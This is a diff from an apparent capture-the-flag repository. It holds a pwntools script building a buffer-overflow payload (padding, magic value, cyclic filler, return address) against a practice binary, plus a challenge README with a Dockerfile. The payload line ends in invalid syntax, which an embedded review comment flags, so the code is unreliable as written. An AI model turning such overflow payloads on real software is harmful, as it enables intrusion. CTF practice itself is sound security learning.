updates
@@ -1,20 +1,24 @@
|
||||
from pwn import *
|
||||
elf = ELF(os.getcwd() + "/0d2dd2de6fc66a1b0e38dc299e38e0da")
|
||||
elf = ELF(os.getcwd() + "/baby")
|
||||
|
||||
gs = '''
|
||||
unset env LINES
|
||||
unset env COLUMNS
|
||||
set follow-fork-mode child
|
||||
br *handle_conn+631
|
||||
# br *main+420
|
||||
# br *0x5663c4b8
|
||||
br gets
|
||||
continue
|
||||
'''
|
||||
|
||||
def start():
|
||||
if args.GDB:
|
||||
return gdb.debug([elf.path], gs)
|
||||
return gdb.debug(elf.path, gs)
|
||||
else:
|
||||
return process([elf.path])
|
||||
|
||||
io = start()
|
||||
io.sendline()
|
||||
# io = start()
|
||||
# input("waiting...")
|
||||
OFFSET = 0x56555000
|
||||
with open("input", "wb+") as f:
|
||||
f.write(b'A'*42 + p32(1) + p32(0xd34db33f) + cyclic(cyclic_find('caaa')) + p32(OFFSET + ^))
|
||||
# io.interactive
|
||||
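Review bot: The `f.write(...)` line ends in `p32(OFFSET + ^)`, which is not valid Python, so the whole script fails to parse and none of the setup above it can run; the rendered page does not show for certain whether this line is on the new side, but it is the state under review. If the last term is still unknown, keep the file parseable by leaving the unfinished `p32(...)` out of the expression and marking the gap with a comment such as `# TODO: final p32() term not determined yet`. Separately, `os.getcwd()` only resolves because `from pwn import *` happens to re-export `os`; an explicit `import os` would make that dependency visible. The hard-coded `OFFSET = 0x56555000` also deserves a comment saying where the value comes from, since a load address like this is presumably only stable with ASLR off, as in the gdb session.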
BIN
Unibw 2023/rev pwn/Baby Cyberdyne/baby
Executable file
BIN
Unibw 2023/rev pwn/Baby Cyberdyne/baby
Executable file
Binary file not shown.
BIN
Unibw 2023/rev pwn/Baby Cyberdyne/input
Normal file
BIN
Unibw 2023/rev pwn/Baby Cyberdyne/input
Normal file
Binary file not shown.
Binary file not shown.
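--- a/Unibw 2023/rev pwn/Hide and Seek/README.md
+++ b/Unibw 2023/rev pwn/Hide and Seek/README.md
@@ -0,0 +1,16 @@
+Hide and Seek
+
+General Ashdown is bored of hiding his ass. He wants some action, but not the dangerous kind ... more some action like watching a duck swim.
+
+9c6600421a497cfaf89a336e0cef2357
+
+Hint: The challenge is build with for glibc (2.36-9) 2.36. If your terminal is crashing or hanging during execution, preload the needed libc or maybe better, just use docker, e.g.:
+
+# Dockerfile
+FROM debian:bookworm
+
+COPY ./9c6600421a497cfaf89a336e0cef2357 /
+
+Build with: docker build -t chall .
+
+Run with: docker run --name chall --rm -it chall bash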